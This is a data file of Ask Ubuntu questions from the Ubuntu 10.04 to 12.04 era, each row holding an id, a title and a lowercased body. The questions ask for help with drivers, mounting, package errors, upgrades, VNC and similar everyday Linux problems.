120219	compiling software in ubuntu 10.10 and creating working shortcuts through sub-menus	a few subjects that i 've found considerable lack of documentation on is the downloading of software outside of each distro 's respective package manager , compiling it , and executing a working program of the likes of windows . i 've tried the command line , the synaptic package manager , all to no avail . all of this is within a custom distro known as openartist , currently based off of ubuntu maverick ( www.openartisthq.com ) , and what i meainly want to achieve is to creating working shortcuts within submenus as well as download , find , and execute working applications possibly outside of the more popular distros ' package managers and then create a path to be launched within a menu . i am new to linux and am fairly unsure as to where i can find information regarding this . if you 'd like a specific example , openartist houses a menu upon the panel known as `` 3d . '' what i would like to accomplish is downloading blender 2.62 and then creating a working path to launch the program . i would like to do this with several other programs , but figure that if i can resolve this , anything else should come easily . thanks ! :3
120228	how do i select a subset of the available fonts for a particular application	having all those exotic fonts ( for an european ) , like chinese , hindi or russian fonts , is nice for a web browser . you never get those ugly unicode blocks and get the original glyphs instead . however , having the font menu in libreoffice or abiword populated with all of those fonts is cumbersome and useless for most installations . having more than a few fonts in note taking applications is also somewhat overkill . is there a way i can designate a subset of all the available fonts to work with a particular application ? i understand the app itself could do it , but i 'm asking for a way to make libreoffice , for instance , not see certain fonts , only my selection of `` useful for text processing '' subset .
120229	what is the fallback font in ubuntu ?	what font does ubuntu use for really irregular characters like , and just general chinese characters ? since it sort of falls back to a font that does have the glyphs , its impossible to tell where it 's coming from . also , does anyone know of any tools i can use to see what glyphs a *.ttf file supplies ( for linux , naturally : p ) ?
120233	ca n't mount ntfs partition without root access	whenever try to mount ntfs partition it says error mounting : mount exited with exit code 1 : helper failed with : unprivileged user can not mount ntfs block devices using the external fuse library . either mount the volume as root , or rebuild ntfs-3g with integrated fuse support and make it setuid root . please see more information at http : //tuxera.com/community/ntfs-3g-faq/ # unprivileged i tried this answer but it wont work my etc/fstab file # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda7 during installation uuid=ed9e007f-da86-4436-993a-8670ebf45939 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=956e15af-d650-42ac-a5f6-89955abaacde none swap sw 0 0 /dev/sda1 /media/sda1 ntfs nls=iso8859-1 , ro , umask=000 , user 0 0
120234	read graphics info in command line ?	is there a command that can read image attributes , i only need it 's height / width .
120239	incorrect monitor colours	i 'm using ubuntu 11.10 and my monitor had a problem where green is the bright colour , there 's no way to change it in the monitor settings , so when i was using winxp ( i 'm new in here ) i changed the green to lower using video driver settings , in here ( ubuntu ) i do n't know exactly how i would change the green colour to low , so my `` black '' would be seem has a real black , no green . thanks for reading . sorry for bad english .
120241	( no root file system ) -ergo no install 12.04	i have my hdd 1tb partitioned with fs ext4 . previously i was booting from the 2tb hard drive ... i disconnected that . now i want a clean install 12.04 but can not figure out `` root file system '' ( `` / '' ) crazy ... had the same problem 2 years ago ... two weeks then ... i should have written down the answer ! can anyone help an old man ? thanks
120242	using dpkg -- set-selections	i used the following commands to lock my samba installation from upgrading . echo samba hold | dpkg -- set-selections echo samba install | dpkg -- set-selections my question is simple . how do i reverse this so that apt-get upgrade samba will work again ?
120247	how do i make flash videos play in my web browser ?	i have downloaded ubuntu 11.10 and have been surfing the web pretty good . i have done all the add-ons and updates , but flash videos will not play . any ideas ?
120254	how to change desktop theme periodically	is it possible change desktop theme in each hour
120256	reboot now does n't work in ubuntu installtion cd/usb	i am currently using window xp 64bit and trying to install ubuntu by clicking `` reboot now '' option in reboot required under demo and full installation button in ubuntu menu of cd/usb ( i tried both from cd and usb ) . but it does n't reboot my machine to install ubuntu . could you anyone help me how to do that ? thanks .
120261	ubuntu 11.10 problem with nvidia	i have an acer with a gforce graphics card . i installed ubuntu 11.10 and it was working properly until i installed nvidia drivers via additional drivers , i hit `` nvidia-xconfig '' in terminal and then reboot . at startup lightdm fails to start . i changed /etc/x11/xorg.conf file back to default and reboot . it works properly , but with the default ubuntu driver . i want to reconfigure nvidia and use it . can anyone tell me what should i do ?
120266	how do i upgrade from 11.10 to 12.04 ?	i am using ubuntu 11 ( ocelot ) on my desktop pc , i installed it to run and keep windows . these days i find i use ubuntu more and more and windows less and less . so , now i see ubuntu 12 is being released real soon , can i update ocelet , or do i have to remove it from my computer and then rinstall ubuntu 12
120268	why did the upgrade from 11.10 to 12.04 ruin my system ?	after upgrading from ubuntu 11.10 to 12.04 , when i log in , everything is ruined . it 's all black , blank white icons , blank black icons on the start menu , and well , nothing works . if i open up chromium , it looks as though it 's in high contrast mode . is this a bug ? any ideas what could have happened ? can i get 11.10 back ? some photos ( ca n't connect to network in ubuntu so i had to take pictures with phone ) : http : //i.stack.imgur.com/2dwkl.jpg http : //i.stack.imgur.com/n4na3.jpg http : //i.stack.imgur.com/lnfje.jpg
120269	what to install on ssd partition	plan to duel boot windows 7 and ubuntu from a 120gb ssd . what 's a good amout of space to allocate ? i have 8 gigs of ram and would like to hibernate , but i could go without it.. i have plenty of space on a regular boring hard drive for the parts that do n't need ssd speed
120271	how do i back up the list of applications i have installed ?	i have very slow internet connection . it sometimes manages to reach as high as 20 kbps ! ! installing large packages like k3b or wine or some games takes takes too much time . if ever somehow i want to reinstall ubuntu then i have to reinstall all this packages which is pain . so how to backup this application ?
120275	how do i add a right click `` compress as zip '' menu entry ?	step 1 : i wanted to add a menu as `` compress as zip '' on right click . i know i can use change default compress format as `` zip '' using gconf-editor . but i wanted to add a new menu item for compressing as zip without opening any other option dialog . step 2 : i wanted to compress a file as zip and rename it as a `` epub '' . please let me know is it possible to zip & rename by adding single menu item ? im using ubuntu 11.04 and installed `` nautilus-action-configurations '' , but unsuccessful . n.b . i have read this ask ubuntu q & a ; i dont want to open a new window to choose me the format . it should be straight away saved as zip .
120278	mp3 codecs can not be installed no software is actually installing	my rythm box player can not play mp3 and iget this error `` gstreamer extra plugins can not be installed on your computer type ( i386 ) either the application requires special hardware features or the vendor decided to not support your computer type '' if i go to software center i get this error the repository may no longer be available or could not be contacted because of network problems . if available an older version of the failed index will be used . otherwise the repository will be ignored . check your network connection and ensure the repository address in the preferences is correct . in shot i have tried to dowload deb softs i still get the error above .so i have downloaded tar.gz and i have installed using terminal but i get another error of gcc c++ insanity check failure ! i ask my self what i am supposed to do nothing is working nothing at all yet i have to run my bussiness help urgently before i collapse and choose to die !
120280	why does this script not open parallel gnome-terminals on a server ?	why am i not able to have parallel gnome-terminals on my server while i can on my client . here is a test that illustrates the problem . # ! /bin/bash # this is the parent script gnome-terminal -- command `` ./left.sh '' gnome-terminal -- command `` ./right.sh '' # ! /bin/bash echo `` this is the left script '' read -p `` press any key to close this terminal '' key # ! /bin/bash echo `` this is the right script '' read -p `` press any key to close this terminal '' key when i run this on a regular ubuntu desktop ( maverick ) i see two terminals . when i run this on a maverick server at a server farm , the second window does not appear until after i close the first one . i am using tightvncserver to view the server desktop .
120283	ca n't adjust backlight on an nvidia 335m gt	i have a laptop mysn qmg6 / chiligreen mobilitas nw which is quanta tw9 barebone with intel i3 and nvidia 335m gt onboard . on ubuntu distros 10.04 , 10.10 , 11.04 and 11.10 i had problem with changing screen backlight with nouveau and nvidia drivers . fn+f4/f5 buttons did not change my brightness . i tried to edit xorg.conf , adding option “registrydwords” “enablebrightnesscontrol=1″ also tried to add some lines to grub acpi_osi= '' linux '' acpi_backlight=vendor neither worked for me . today i installed ubuntu 12.04 beta2 and ... with nouveau driver my fn key works , and changes the brightness ( is it a new 3.0.22 linux kernel , or patched nouveau driver , i do n't know ) . this is a big step forward . but , when installing proprietary nvidia driver ( 295.33 ) fn button stops working and i ca n't change brightness . i also tried workaround with xorg and grub with no result . tried to install acpi from apt - no result . is there anything left to try ? i really need that nvidia driver working with fn keys , as i would like to have a working 3d acceleration . p.s . does the nouveau driver has 3d acceleration like nvidia drivers ? ? ? if there is need to provide some log data , please write what should i print , as i 'm a bit new to ubuntu . p.p.s . same problems i had with other linux distros ( mint , fedora and others ) p.p.p.s . other fn buttons work with both drivers ( mute , vol up/down , wifi on/off , bluetooth , sleep , start/pause , stop , next/prev song ) some new thoughts ... config_backlight_generic=m could this be an issue ? made this by grep backlight /boot/config-3.2.0-22-generic-pae full grep output can be viewed here : http : //pastebin.com/smrd2z4k
120284	how can i modify the pitch of my audio output ?	i would like to modify the pitch of my audio output . i know you can use software such as playitslowly to listen to an audio file and alter the pitch in the process , but what i am looking for is a way to modify the pitch just as i do with the volume . i can do it on windows with realtek 's sound manager , so i guess there must be a way to do it on linux as well .
120287	dash does n't launch gedit at the first try	i 'm curious to find out what 's going on here . push the [ windows ] key -- > dash pops up . type 'ge ' -- > 'text editor ' appears . [ enter ] -- > nothing happens . with any other program , it launches the program . repeat the steps and gedit launches . from terminal , gedit does n't start . in the system monitor , it 's 'sleeping ' . this happens in my session , in my wife 's session on the same computer , gedit runs . any idea why gedit sleeps at the first launch ?
120295	can not boot ubuntu 10.04 from usb	i tried to install ubuntu 10.04 from my silicon power 4gb pendrive.i currently have installed ubuntu 11.10 . i downloaded `` ubuntu-10.04.4-desktop-i386 '' from ubuntu 's site and created an usb bootable drive using the instructions from the site . when i insert my usb to boot it gives the following error : unknown keyword in configuration file : gfxboot vesamenu.c32 : not a com32r image boot : please , can you give me any solution ?
120297	update information outdated	i have a warning triangle that my update information is outdated , the last update was 12 days ago . i use ubuntu 11.10 . a run of sudo apt-get update produces the following output : ign http : //ppa.launchpad.net oneiric inrelease ign http : //de.archive.ubuntu.com oneiric inrelease ign http : //de.archive.ubuntu.com oneiric-updates inrelease ign http : //de.archive.ubuntu.com oneiric-backports inrelease ign http : //security.ubuntu.com oneiric-security inrelease ign http : //extras.ubuntu.com oneiric inrelease hit http : //ppa.launchpad.net oneiric release.gpg get:1 http : //de.archive.ubuntu.com oneiric release.gpg [ 198 b ] hit http : //security.ubuntu.com oneiric-security release.gpg get:2 http : //extras.ubuntu.com oneiric release.gpg [ 72 b ] hit http : //ppa.launchpad.net oneiric release hit http : //de.archive.ubuntu.com oneiric-updates release.gpg hit http : //security.ubuntu.com oneiric-security release hit http : //extras.ubuntu.com oneiric release err http : //extras.ubuntu.com oneiric release hit http : //ppa.launchpad.net oneiric/main sources hit http : //de.archive.ubuntu.com oneiric-backports release.gpg hit http : //security.ubuntu.com oneiric-security/main sources hit http : //ppa.launchpad.net oneiric/main i386 packages ign http : //ppa.launchpad.net oneiric/main translationindex ign http : //linux.dropbox.com oneiric inrelease hit http : //security.ubuntu.com oneiric-security/restricted sources hit http : //security.ubuntu.com oneiric-security/universe sources hit http : //security.ubuntu.com oneiric-security/multiverse sources hit http : //security.ubuntu.com oneiric-security/main i386 packages hit http : //security.ubuntu.com oneiric-security/restricted i386 packages hit http : //security.ubuntu.com oneiric-security/universe i386 packages hit http : //security.ubuntu.com oneiric-security/multiverse i386 packages hit http : //security.ubuntu.com oneiric-security/main translationindex hit http : //security.ubuntu.com oneiric-security/multiverse translationindex hit http : //security.ubuntu.com oneiric-security/restricted translationindex hit http : //security.ubuntu.com oneiric-security/universe translationindex hit http : //de.archive.ubuntu.com oneiric release hit http : //de.archive.ubuntu.com oneiric-updates release ign http : //de.archive.ubuntu.com oneiric release hit http : //security.ubuntu.com oneiric-security/main translation-en hit http : //security.ubuntu.com oneiric-security/multiverse translation-en hit http : //linux.dropbox.com oneiric release.gpg hit http : //security.ubuntu.com oneiric-security/restricted translation-en hit http : //de.archive.ubuntu.com oneiric-backports release hit http : //security.ubuntu.com oneiric-security/universe translation-en ign http : //de.archive.ubuntu.com oneiric/main sources/diffindex ign http : //de.archive.ubuntu.com oneiric/restricted sources/diffindex ign http : //de.archive.ubuntu.com oneiric/universe sources/diffindex ign http : //de.archive.ubuntu.com oneiric/multiverse sources/diffindex ign http : //de.archive.ubuntu.com oneiric/main i386 packages/diffindex ign http : //de.archive.ubuntu.com oneiric/restricted i386 packages/diffindex ign http : //de.archive.ubuntu.com oneiric/universe i386 packages/diffindex ign http : //de.archive.ubuntu.com oneiric/multiverse i386 packages/diffindex hit http : //linux.dropbox.com oneiric release get:3 http : //de.archive.ubuntu.com oneiric/main translationindex [ 3,289 b ] get:4 http : //de.archive.ubuntu.com oneiric/multiverse translationindex [ 2,265 b ] hit http : //de.archive.ubuntu.com oneiric/restricted translationindex get:5 http : //de.archive.ubuntu.com oneiric/universe translationindex [ 2,640 b ] hit http : //de.archive.ubuntu.com oneiric-updates/restricted i386 packages hit http : //de.archive.ubuntu.com oneiric-updates/universe i386 packages hit http : //de.archive.ubuntu.com oneiric-updates/multiverse i386 packages hit http : //de.archive.ubuntu.com oneiric-updates/main translationindex hit http : //de.archive.ubuntu.com oneiric-updates/multiverse translationindex hit http : //de.archive.ubuntu.com oneiric-updates/restricted translationindex hit http : //de.archive.ubuntu.com oneiric-updates/universe translationindex hit http : //de.archive.ubuntu.com oneiric-backports/main sources hit http : //linux.dropbox.com oneiric/main i386 packages ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //linux.dropbox.com oneiric/main translationindex hit http : //de.archive.ubuntu.com oneiric-backports/restricted sources hit http : //de.archive.ubuntu.com oneiric-backports/universe sources hit http : //de.archive.ubuntu.com oneiric-backports/multiverse sources hit http : //de.archive.ubuntu.com oneiric-backports/main i386 packages hit http : //de.archive.ubuntu.com oneiric-backports/restricted i386 packages hit http : //de.archive.ubuntu.com oneiric-backports/universe i386 packages hit http : //de.archive.ubuntu.com oneiric-backports/multiverse i386 packages hit http : //de.archive.ubuntu.com oneiric-backports/main translationindex hit http : //de.archive.ubuntu.com oneiric-backports/multiverse translationindex hit http : //de.archive.ubuntu.com oneiric-backports/restricted translationindex hit http : //de.archive.ubuntu.com oneiric-backports/universe translationindex hit http : //de.archive.ubuntu.com oneiric/main sources hit http : //de.archive.ubuntu.com oneiric/restricted sources hit http : //de.archive.ubuntu.com oneiric/universe sources hit http : //de.archive.ubuntu.com oneiric/multiverse sources hit http : //de.archive.ubuntu.com oneiric/main i386 packages hit http : //de.archive.ubuntu.com oneiric/restricted i386 packages hit http : //de.archive.ubuntu.com oneiric/universe i386 packages hit http : //de.archive.ubuntu.com oneiric/multiverse i386 packages hit http : //de.archive.ubuntu.com oneiric/restricted translation-en hit http : //de.archive.ubuntu.com oneiric-updates/main translation-en hit http : //de.archive.ubuntu.com oneiric-updates/multiverse translation-en hit http : //de.archive.ubuntu.com oneiric-updates/restricted translation-en hit http : //de.archive.ubuntu.com oneiric-updates/universe translation-en hit http : //de.archive.ubuntu.com oneiric-backports/main translation-en hit http : //de.archive.ubuntu.com oneiric-backports/multiverse translation-en hit http : //de.archive.ubuntu.com oneiric-backports/restricted translation-en hit http : //de.archive.ubuntu.com oneiric-backports/universe translation-en err http : //de.archive.ubuntu.com oneiric-updates/main sources 416 requested range not satisfiable [ ip : 141.30.13.30 80 ] err http : //de.archive.ubuntu.com oneiric-updates/restricted sources 416 requested range not satisfiable [ ip : 141.30.13.30 80 ] err http : //de.archive.ubuntu.com oneiric-updates/universe sources 416 requested range not satisfiable [ ip : 141.30.13.30 80 ] err http : //de.archive.ubuntu.com oneiric-updates/multiverse sources 416 requested range not satisfiable [ ip : 141.30.13.30 80 ] err http : //de.archive.ubuntu.com oneiric-updates/main i386 packages 416 requested range not satisfiable [ ip : 141.30.13.30 80 ] ign http : //linux.dropbox.com oneiric/main translation-en_us ign http : //linux.dropbox.com oneiric/main translation-en fetched 273 b in 2s ( 91 b/s ) reading package lists ... done w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //extras.ubuntu.com oneiric release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //de.archive.ubuntu.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/oneiric/release w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/oneiric/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/de.archive.ubuntu.com_ubuntu_dists_oneiric_main_i18n_index w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/oneiric/multiverse/i18n/index no hash entry in release file /var/lib/apt/lists/partial/de.archive.ubuntu.com_ubuntu_dists_oneiric_multiverse_i18n_index w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/oneiric/universe/i18n/index no hash entry in release file /var/lib/apt/lists/partial/de.archive.ubuntu.com_ubuntu_dists_oneiric_universe_i18n_index w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/oneiric-updates/main/source/sources 416 requested range not satisfiable [ ip : 141.30.13.30 80 ] w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/oneiric-updates/restricted/source/sources 416 requested range not satisfiable [ ip : 141.30.13.30 80 ] w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/oneiric-updates/universe/source/sources 416 requested range not satisfiable [ ip : 141.30.13.30 80 ] w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/oneiric-updates/multiverse/source/sources 416 requested range not satisfiable [ ip : 141.30.13.30 80 ] w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/oneiric-updates/main/binary-i386/packages 416 requested range not satisfiable [ ip : 141.30.13.30 80 ] w : some index files failed to download . they have been ignored , or old ones used instead . there are some questions with similar problems , but no one seems to get these `` range not satisfiable '' errors . i do not use a proxy , and the network configuration should not have changed since it worked the last time .
120305	software center	hi i am a newbie and have the following problem , any help would be greatly appreciated the software center is opening with a blank screen can you please help
120312	how do i forcibly stop the x server ?	i am new bie to ubuntu . i am using ubuntu 11.10 when i tried to forcibly kill the x server from my process it again starts and prompts me a login screen how this is happening . please help me : vj 2383 908 0 15:01 tty2 00:00:00 -bash root 3054 1 0 15:04 ? 00:00:00 lightdm root 4395 3054 14 15:12 tty7 00:21:50 /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -noliste vj 4498 1 0 15:12 ? 00:00:00 /usr/bin/gnome-keyring-daemon -- daemonize -- login vj 4508 3054 0 15:12 ? 00:00:00 /usr/bin/gnome-session -- session=ubuntu kill 4395
120317	make bootable usb drive from ubuntu	i need windows for a few things , and while i love ubuntu . i think i 'll have to install windows agian for a short period of time . i got the .iso file on my desktop , and need to make it bootable from a flash drive . it 's pretty easy from windows , but i ca n't seem to figure out how to do it from ubuntu . i 've searched on google and here as well , but all i can find is how to make it from os x , windows.. or how to make a bootable flash drive with ubuntu from ubuntu . thanks !
120318	how to find 2.6.35 pae kernel for 10.04 ?	i once found a website where i could download the pae kernels manually , but now i have been searching and ca n't come up with the site . i just installed 10.04 and want the updated kernel now , so i do n't have to re-config anything when a new kernel comes out . anyone can help ? would appreciate it .
120319	how do i install libimobiledevice ?	i have precise and i want to get my iphone working with rhythmbox , i have the latest package , but dont know how to install , the installer instructions look like gibberish to me .
120321	backlight not on during ubuntu 11.10 installation hp folio 13	i have a hp folio 13 b2a32ut and i am trying to install ubuntu 11.10 64bit , but unfortunately after it shows the purple screen , with the little human and the keyboard in the bottom of the screen and when it gets to the point to show the window with the 2 buttons which say : '' install ubuntu '' , '' try ubuntu '' it shows almost nothing to the screen as it is like the back-light of the screen is turned off ! the problem is that i am not able to see anything as it is next to impossible to see what the screen shows and the only way to see what the screen displays at this moment is to put a lamplight very close to the screen . but , again everything that is displayed looks very dim and i ca n't do the installation properly . can anybody help ?
120327	problems with sopcast	i have a problem with sopcast-player , i have installed it in the computer as in this question is described how to install sopcast-player ? . all correct , its installed in my computer , but when i want to start this program , i ca n't , i make click on the aplication but it does n't start .
120330	can not view the logfile ?	i am a beginner . i have managed to install ubuntu 11.10 and am now satisfied that it seems to be running okay . it would help me learn more to be able to view the logfile but i can not . what have i missed or what am i dping wrong ( also i have no swap file just incase this maybe related ) . any help appreciated please .
120334	can i upgrade ghostscript from source on 10.04 over existing gs version 8.71 ?	i would like to upgrade to a newer version of ghostscript ( latest is 9.05 , but anything in the 9.x series ) . can i build and install from source over the top of the existing install ? i had a dry-run of uninstalling current version , but there were a lot of other things that would be removed with it that i did n't want to remove ( for example freenx ? ? ) .
120339	suggest me some kool themes for 11.10	here 's how my desktop looks :
120342	ubuntu 12.04 desktop deployment	i am looking for a way to deploy about 80-100 ubuntu desktops at a school , when ubuntu 12.04 is available . what would you prefer for deployment system , microsoft configuration manager cant do the task : )
120345	what is the file name of the default background ?	i was trying to change this picture , and forget the name of the background . tried warty-final-ubuntu.png and warty-final-ubuntu.jpg but no use .
120346	how to inhibit only auto suspend when running certain apps ?	i find this weird in linux : with auto-suspend enabled , the unattended computer goes to sleep even though a music player ( or any other process ) is running . this is annoying when i want to leave computer on and listen to some music or when i want to use it as htpc . system : intel core i3-2100 , asus p8h67-m evo intel h67 and a ssd . ( and i do n't have a swap partition . ) should i do something in bios or are there other solutions including an app ? ( caffeine inhibits screensaver as well and i do n't want that . ) a de agnostic solution would be preferable ( i 'm on lxde ) .
120347	how can i add space from unallocated to extended ?	i have a 12 gb partition with linux installed in it , but i started runnung out of space . i tried to use gparted on a cd , but for some reason , i could not add space to the extended partition . this is what my partition table looks like : /dev/sda3 : extended 12 gb /dev/sda5 : ext4 10 gb /dev/sda6 : linux-swap 2 gb unallocated : 69,77 gb i want to add unallocated to /dev/sda5 . i tried to resize both dev/sda3 and /dev/sda5 , but no free space is shown in the window . thanks in advance .
120365	how to burn a blu-ray disc in a dvd-r ?	i have a blu-ray disc of my project . i need rip this to my hd and burn this content in a dvd-r. its possible ?
120367	how to connect to wi-fi ap through wps ?	how to connect to wi-fi ap through wps ? all ways will be nice : configs , cli , gui - anything .
120370	how do i mount a usb floppy disk drive ?	i have tried to mount my usb floppy disk drive in 11.04 natty . so far i have managed to use the udisks -- mount/dev/sdf command in terminal , but get a message that i have not stated a filetype john @ john-desktop : ~ $ udisks -- mount /dev/sdf mount failed : error mounting : mount : you must specify the filesystem type this is the result i get when trying to mount the usb floppy disk drive . anyone know how to proceed ?
120376	how to resolve broken dependencies of gnome-shell-extensions-user-theme package ?	after unsuccessful upgrade of gnome3 packages in new precise pangolin 64-bit environment i get this error at installing gnome-shell-extensions-user-theme package : the following packages have unmet dependencies : gnome-shell-extensions : conflicts : gnome-shell-extensions-user-theme but 3.2.0-2~webupd8~oneiric is to be installed e : unable to correct problems , you have held broken packages . i tried to remove by running sudo apt-get purge gnome-shell-extensions-user-theme but get this : package gnome-shell-extensions-user-theme is not installed , so not removed my gnome classic profile works well but gnome3 session ca n't run . how to resolve this error ?
120382	compiz command plugin wo n't register keyboard shortcuts	per this discussion i 've enabled the compiz commands plugin in order to try to bind some keyboard shortcuts to wmctrl actions . ccsm captures my keystrokes just fine , but no matter what keystroke i try or what command i bind it to ( everything from my original intention of binding super-1 , super-2 etc . to wmctrl -o 0,0 , wmctrl -o 2560,0 , etc. , to binding ctrl-alt-shift-l to gnome-terminal ) . basic compiz shortcuts for window switching and so on -- even custom ones -- seem to work fine , but the command plugin does n't seem to be working at all . i also notice the following symptom : when i open the keyboard shortcut tab in ccsm , the keyboard shortcuts often at first appear blank , though if you click on the blank button , the correct value is still there . also possibly related , i 've noticed that gnome-terminal does n't seem to notice the super key , though other apps ( e.g . ccsm , emacs ) register it fine . anyway , it seems like something 's eating my keystrokes . any ideas ?
120383	when do i need submit my software by in order to be in the software center for 12.04 ?	i am working on developing a program and want to put it in the software center when i am finished . do i have to upload the program to developer.ubuntu before the release of 12.04 if i want it to be in the 12.04 software center ? or can i finish after the release and have it put in the repositories at that time ?
120384	how do i redirect my apache web app from an alias of one domain to a sub domain of another ?	i have a web application on www.domain1.com where i have installed apache2 and tomcat7 . i would like to make a redirect from www.domain2.com ( which is a www.domain1.com alias ) to www.domain1.com:8080/app what would be the best way to do it ?
120387	ca n't get vnc to connect	i have a server and my laptop . i want to be able to start vnc server on the server and then connect from my laptop . both are running ubuntu 11.10 64 bit desktop on my server , i installed tightvncserver . i set it up with a password , no view only password . i ssh to the box and typed vncserver :42 now on my laptop , i installed gtkvncviewer and ran it . it popped up a box . i entered the picard:42 ( the name of the server in my /etc/hosts file ) and the password . i tried with and without the user . it always disconnects immediately . can anyone point out what i 'm doing wrong ? is it because i 'm not running a gui session currently on picard ? if so , how can i start the xwindows session remotely to connect with vncserver ?
120392	can not update 10.04 server	i 've tried to update 10.04.3 server but i get an error ( sorry but trey 're written in slovene ) says that can not download updates and can not connect to http : //si.archive.ubuntu.com lucid release any idea ?
120395	working with quickly , are there any gtk.builder code sketching tools that integrate ?	example : quickly create ubuntu-application testing quickly design # makes changes # insert some other command here that would be roughly equivalent to 'quickly sketch' quickly edit # to populate the sketched functions willing to accept other gtk.builder solutions that work if they 're demonstrated/screenshots with a quickly generated ui/xml pair . in this context what i mean by code sketching and the desired effect would be quickly sketch results in empty functions being created in the appropriate files instead of capturing stderr on quickly run and adding them , then populating them . a simple example , add a button in quickly design . it will still launch with quickly run as you expect . something i miss from wxglade is the code-sketching for new buttons/etc . might be more of a glade/gtk.builder question than a quickly question . in response to the answer , i opened a whishlist bug here . i also started working on a project i 'm calling simply . the first bits of code are here . it includes simple code-sketching of callbacks .
120397	identify mailserver running on remote box ?	hey guys i 'm going through a hosting company that set up a mailserver and i am trying to identify the mailserver ( postfix , sendmail , exim ? ) so i can set up a monit rule around it , but have n't had any luck . is there a command to tell me what mail is using ?
120401	download latest bzr revision only	sometimes i want to get a bzr branch ( e.g . lp : ~elementary-design/+junk/elementarywalls or lp : gimp ) , but i have a slow internet connection and only want to download the latest revision . how do i do this , starting with an empty folder ( i.e . no pre-existing branch on my computer ) ?
120404	windows are moving slowly on ubuntu 11.10	video card : ati mobility radeon hd 3650 although my video card ati when i check system info driver : vesa : m86 experience : fallback i checked compiz config manager and disable all effects insipite of this windows are moving slowly.it does not for all windows , for example when i use google chrome and scrool up/down there is no effect but when i move window to another position it moves slowly but when i use pdf reader when i scrool up or down it moves slowly.how can i solve this ? i use core 2 duo intel cpu and run ubuntu 11.10 . edit : the solution : upgrade kernel and then update all graphic card drivers.now there is no problem .
120412	ca n't create a folder inside my local server ?	i recently installed lampp server ( version 1.7.7 ) so i went to my local folder , which i believe is in /opt/lampp/htdocs because that 's where i 've installed my server in , and wanted to create a folder where i can put my projects in , but i could n't because the option in the right-click menu is n't even available . so please any help would be very apreciated : )
120413	dual-boot partitioning	i just bought a new laptop with windows 7 installed and i 'm planning on installing ubuntu 11.10 for a dual-boot . here 's my rather basic problem : i have a 750go hard drive , pretty much partitioned like this : recovery : 25go c : ( windows 7 ) : 295go d : ( data ) : 380go that is the factory configuration , the hard drive is still fairly empty ( i removed all the bloatware and did n't install anything yet ) . this is what i 'd like to obtain : keep my recovery partition a partition for windows 7 a partition for ubuntu a `` big '' common partition for windows and ubuntu data , all the files i 'm going to create . how can i do that ? do i have to resize/create the partitions in windows 7 before installing ubuntu ? do i have to do it while installing ubuntu using gparted ? i 'm quite confused and i 'd like to make it right so i guess i need your help . thanks a lot everyone .
120415	how to remove access point from saved list	os : ubuntu 11.10 with gnome-shell i 've few access points on my saved list which i want to remove and never connect to . i ca n't seem to find way to delete these . how should i remove ( at least not auto connect ) from saved access point list ?
120416	how to safely remove or repair plymouth package ?	i have a broken package ... so far nothing horrible . the problem is that it is plymouth , and it seems that if i remove it , i will remove half of the packages of my system ... so here is my question : if i actually remove , or even purge plymouth ; will i at least have a terminal left after it to reinstall it ? or am i definitely doomed ? just to illustrate what i say ; here is the result of an apt-get -- reinstall install plymouth : julien @ julien-desktop : ~ $ sudo apt-get -- reinstall install plymouth reading package lists ... done building dependency tree reading state information ... done reinstallation of plymouth is not possible , it can not be downloaded . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : plymouth : depends : libdrm-nouveau1 ( > = 2.4.11-1ubuntu1~ ) but it is not installable recommends : plymouth-themes-all but it is not installable e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . or an apt-get -f install ( well basically it is the same ) julien @ julien-desktop : ~ $ sudo apt-get -f install [ sudo ] password for julien : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : plymouth : depends : libdrm-nouveau1 ( > = 2.4.11-1ubuntu1~ ) but it is not installable recommends : plymouth-themes-all but it is not installable e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies julien @ julien-desktop : ~ $ any idea would be very welcome ...
120430	ubuntu fails on boot up	i have a dual-boot of windows 7 and ubuntu 11.10 . amd phenom-ii 4-core processor , and an asus motherboard . so here 's what happens , i turn on my computer my machine does its start-up process , then the grub comes up and i choose ubuntu . the ubuntu logo comes up with the five dots below it . it will do this for 15 seconds , then i get a screen with different processes starting such as bluetooth and components starting up and all are accepted , then it will freeze on a midi process with this text . *starting timidity++ alsa midi emulation ... [ ok ] i left it like this for 8 hours and there were no changes on the screen . i have tried some fixes for issues similar to mine but none have worked .
120435	how do i make zte mf192 usb modem work ?	the closest to a solution is : getting a huawei ec159 usb modem working on ubuntu 11.04 i have no idea what flag to pass to usb_modeswitch and i do not want to mess up anything . the output from lsusb : bus 001 device 004 : id 19d2:0146 onda communication s.p.a. is zte mf192 supported at all ? see also problem with zte mf637 ( usb modem ) use a newer zte modem with usb-modeswitch zte usb modem - make it work mobile broadband zte mf192 stick under linux
120436	how do i reset my maas username/password ?	i 've set up maas but forgot the username and password , how can i reset it ?
